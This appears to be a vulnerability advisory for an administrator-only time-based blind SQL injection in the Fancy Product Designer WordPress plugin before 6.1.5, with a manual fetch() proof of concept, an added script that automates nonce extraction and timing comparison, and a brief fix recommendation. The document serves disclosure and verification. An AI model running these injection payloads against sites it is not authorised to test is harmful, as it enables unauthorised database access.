wpexploit | Ivan Spiridonov | WPEX-ID:4B8B9638-D52A-40BC-B298-AE1C74788C18
History: Feb 20, 2024 - 12:00 a.m.

Fancy Product Designer < 6.1.5 - Admin+ SQL Injection

Tags: fancy product designer, admin login, catalog product, sql injection, security exploit, nonce-based fetch

AI Score: 7.4 High (Confidence: Low)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description: The plugin does not properly sanitise and escape the filter_by parameter of the fpd_get_products AJAX action before using it in a SQL statement, leading to a SQL injection exploitable by administrators (the request requires an administrator session and a valid nonce, so the issue is only reachable post-authentication).

- Log in as an administrator and visit /wp-admin/.
- Add a Catalog Product in /wp-admin/admin.php?page=fancy_product_designer
- Search the page source for "fpd_dismiss_notification" and note the nonce associated with it.
- Run the following fetch() call in the browser's developer console, replacing $NONCE with that nonce:

```javascript
// filter_by carries the injected expression ID,(select*from(select(sleep(20)))a); $NONCE is the fpd_dismiss_notification nonce
fetch('/wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=$NONCE&filter_by=ID%2c(select*from(select(sleep(20)))a)&sort_by=ASC&page=1&type=catalog').then(x=>x.text()).then(x=>console.log(x))
```

The server takes approximately 20 seconds to answer, matching the sleep(20) in the payload and confirming that the injected SQL statement was executed (a time-based blind SQL injection). Compare against the same request with filter_by=ID and no payload: that baseline should return in well under a second, which rules out ordinary server latency as the cause of the delay.
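The steps above can be scripted so that the check is repeatable and compares a baseline request with the injected one instead of relying on a stopwatch. The following is an added example written for this page, not code from the advisory or from the plugin; it assumes the nonce appears in the page source as a standard 10-character hexadecimal WordPress nonce within a few characters of the string fpd_dismiss_notification, and that filter_by=ID is a valid un-injected value (the advisory's payload starts with ID, which suggests it is a column name). The function names extractNonce, buildProbeUrl, judgeTiming and confirmTimeBasedSqli are the example's own.

```javascript
// Added example (not from the original advisory): automates the manual PoC
// as a time-based blind SQL injection check against fpd_get_products.

// WordPress nonces are 10 lowercase hex characters. The exact markup that
// carries the fpd_dismiss_notification nonce is an assumption; the regex
// only requires the token to follow the string within a few characters.
const NONCE_RE = /fpd_dismiss_notification\W{0,40}?\b([a-f0-9]{10})\b/i;

function extractNonce(html) {
  const m = NONCE_RE.exec(html);
  return m ? m[1] : null;
}

// Builds the same request the advisory sends, with the sleep() delay as a
// parameter so a baseline (delay 0, filter_by=ID; assumed valid) and a
// probe can be compared. encodeURIComponent leaves ( ) * untouched and
// encodes the comma as %2C, matching the advisory's URL.
function buildProbeUrl(nonce, delaySeconds, base = "") {
  const filterBy = delaySeconds > 0
    ? `ID,(select*from(select(sleep(${delaySeconds})))a)`
    : "ID";
  const qs = [
    "action=fpd_get_products",
    `_ajax_nonce=${encodeURIComponent(nonce)}`,
    `filter_by=${encodeURIComponent(filterBy)}`,
    "sort_by=ASC",
    "page=1",
    "type=catalog",
  ].join("&");
  return `${base}/wp-admin/admin-ajax.php?${qs}`;
}

// Blind-SQLi verdict: the probe must be slower than the baseline by most of
// the requested delay. The 0.8 factor absorbs latency jitter while keeping
// an ordinary slow response from being misread as a confirmation.
function judgeTiming(baselineMs, probeMs, delaySeconds) {
  return probeMs - baselineMs >= delaySeconds * 1000 * 0.8;
}

// Driver for a logged-in browser console (fetchFn = window.fetch); any
// fetch-compatible function that carries the admin session cookie works.
async function confirmTimeBasedSqli(fetchFn, nonce, delaySeconds = 20) {
  const timeRequest = async (url) => {
    const t0 = Date.now();
    const r = await fetchFn(url, { credentials: "include" });
    await r.text(); // wait for the full body, not just the headers
    return Date.now() - t0;
  };
  const baselineMs = await timeRequest(buildProbeUrl(nonce, 0));
  const probeMs = await timeRequest(buildProbeUrl(nonce, delaySeconds));
  return {
    baselineMs,
    probeMs,
    vulnerable: judgeTiming(baselineMs, probeMs, delaySeconds),
  };
}

// Browser usage, after extracting the nonce from document.documentElement.outerHTML:
//   confirmTimeBasedSqli(fetch, extractNonce(document.documentElement.outerHTML)).then(console.log)
```

The baseline request matters: a plugin that is merely slow, or a site behind a proxy with a long timeout, can produce a multi-second response without any injection, so only the difference between the two timings should be read as evidence. The server-side fix for this class of bug is to accept filter_by and sort_by only from a fixed allowlist of column names and sort directions rather than interpolating them into the query.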

